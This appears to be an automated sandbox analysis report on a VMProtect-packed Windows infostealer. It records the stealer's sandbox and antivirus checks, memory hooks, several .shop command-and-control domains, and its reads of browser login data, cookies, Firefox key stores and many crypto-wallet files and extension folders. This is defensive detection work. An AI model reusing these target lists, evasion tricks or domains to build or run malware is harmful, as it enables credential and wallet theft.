              Source: file.exe, 00000000.00000003.1674099563.0000000003D88000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673861505.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: file.exe, 00000000.00000003.1693486798.0000000000EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
              Source: file.exe, 00000000.00000003.1674099563.0000000003D88000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673861505.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: file.exe, 00000000.00000003.1692808922.0000000003E99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: file.exe, 00000000.00000003.1692808922.0000000003E99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: file.exe, 00000000.00000003.1692808922.0000000003E99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: file.exe, 00000000.00000003.1692808922.0000000003E99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000003.1692808922.0000000003E99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownHTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49737 version: TLS 1.2

              System Summary

              barindex
              Source: file.exeStatic PE information: .vmp0 and .vmp1 section names
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD20100_2_00FD2010
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC04B70_2_00FC04B7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA47400_2_00FA4740
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC0CA00_2_00FC0CA0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA60300_2_00FA6030
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA10000_2_00FA1000
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA52F00_2_00FA52F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA32600_2_00FA3260
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA65F00_2_00FA65F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD45F00_2_00FD45F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FAF6900_2_00FAF690
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD97D00_2_00FD97D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA17000_2_00FA1700
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC58A20_2_00FC58A2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC59D20_2_00FC59D2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100387F0_2_0100387F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC594F0_2_00FC594F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD9AF00_2_00FD9AF0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBCAEC0_2_00FBCAEC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD1A700_2_00FD1A70
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA7CB00_2_00FA7CB0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA3D700_2_00FA3D70
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA2E700_2_00FA2E70
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00FA8D30 appears 168 times
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00FFF648 appears 34 times
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00FA8700 appears 50 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000003.1673678697.0000000003DA4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: file.exeStatic file information: File size 5747200 > 1048576
              Source: file.exeStatic PE information: Raw size of .vmp1 is bigger than: 0x100000 < 0x57a800
              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp1
              Source: file.exeStatic PE information: section name: .vmp0
              Source: file.exeStatic PE information: section name: .vmp1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEB2F4 push ebp; ret 0_2_00FEB2F8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEB29C push 1BCCBC0Fh; iretd 0_2_00FEB2A1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE926A push edi; ret 0_2_00FE926B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE9240 push edi; ret 0_2_00FE924B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEB300 push esi; ret 0_2_00FEB79F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE94FD push edi; ret 0_2_00FE94FE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE94D7 push edi; ret 0_2_00FE94FC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE94A5 push ebp; ret 0_2_00FE94A6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE95D4 push ebp; ret 0_2_00FE95FC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFF68D push ecx; ret 0_2_00FFF6A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEC633 push esi; ret 0_2_00FEC63F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEC9D5 push ebp; ret 0_2_00FEC9F1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE9976 push ebx; ret 0_2_00FE997B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FECACE push ebp; ret 0_2_00FECACF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEAA34 push edi; ret 0_2_00FEAA3B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEBA18 push esi; ret 0_2_00FEBA1C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE9D88 push edi; ret 0_2_00FE9D99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEAD7C push edi; ret 0_2_00FEADBB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFDFD0 push ecx; ret 0_2_00FFDFE3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEAF49 push ebx; ret 0_2_00FEAF58

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Users\user\Desktop\file.exeMemory written: PID: 6816 base: CF0005 value: E9 8B 2F 21 76 Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: PID: 6816 base: 76F02F90 value: E9 7A D0 DE 89 Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: file.exe, file.exe, 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: THSBIEDLL.DLL
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D0C78 second address: 13D0C9B instructions: 0x00000000 rdtsc 0x00000002 xor bl, cl 0x00000004 shrd eax, eax, 000000EAh 0x00000008 shl dl, FFFFFFE6h 0x0000000b push ebp 0x0000000c adc bp, 2834h 0x00000011 bswap ebp 0x00000013 push edi 0x00000014 bts ebp, esp 0x00000017 shld bp, cx, 0000002Ah 0x0000001c xadd dx, ax 0x00000020 push ebx 0x00000021 cbw 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BBD27 second address: 12BBD2E instructions: 0x00000000 rdtsc 0x00000002 pop edi 0x00000003 or ah, FFFFFFE5h 0x00000006 pop ebp 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exe TID: 6856Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 6860Thread sleep time: -30000s >= -30000sJump to behavior
              Source: file.exe, 00000000.00000003.1673148684.0000000000E3A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1745794964.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673941731.0000000000E3A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1682855483.0000000000E3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.1745794964.0000000000DDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD3CC0 LdrInitializeThunk,0_2_00FD3CC0

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: file.exe, 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: demonstationfukewko.shop
              Source: file.exe, 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: liabilitynighstjsko.shop
              Source: file.exe, 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: alcojoldwograpciw.shop
              Source: file.exe, 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: incredibleextedwj.shop
              Source: file.exe, 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: shortsvelventysjo.shop
              Source: file.exe, 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: shatterbreathepsw.shop
              Source: file.exe, 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: tolerateilusidjukl.shop
              Source: file.exe, 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: productivelookewr.shop
              Source: file.exe, 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: greetclassifytalk.shop
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: file.exe, 00000000.00000003.1745411861.0000000000E90000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1745362507.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1746018029.0000000000E92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6816, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: file.exe, 00000000.00000003.1673148684.0000000000E87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "%appdata%\\Electrum\\wallets",
              Source: file.exe, 00000000.00000003.1673148684.0000000000E87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
              Source: file.exe, 00000000.00000003.1673148684.0000000000E87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ", "simple-storage.json", "window-state.json"],
              Source: file.exe, 00000000.00000003.1673148684.0000000000E87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "%appdata%\\Exodus\\exodus.wallet",
              Source: file.exe, 00000000.00000003.1673148684.0000000000E87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "%appdata%\\Ethereum\
              Source: file.exe, 00000000.00000003.1673148684.0000000000E87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
              Source: file.exe, 00000000.00000003.1673148684.0000000000E3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
              Source: file.exe, 00000000.00000003.1673148684.0000000000E87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "%appdata%\\Ethereum\
              Source: file.exe, 00000000.00000003.1673148684.0000000000E87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exe, 00000000.00000003.1673148684.0000000000E87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "keystore"
              Source: file.exe, 00000000.00000003.1673941731.0000000000E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger LiveC
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
